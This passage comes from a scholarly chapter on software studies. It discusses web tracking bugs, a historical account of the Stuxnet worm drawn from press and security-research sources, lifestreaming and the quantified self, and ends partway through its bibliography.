plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
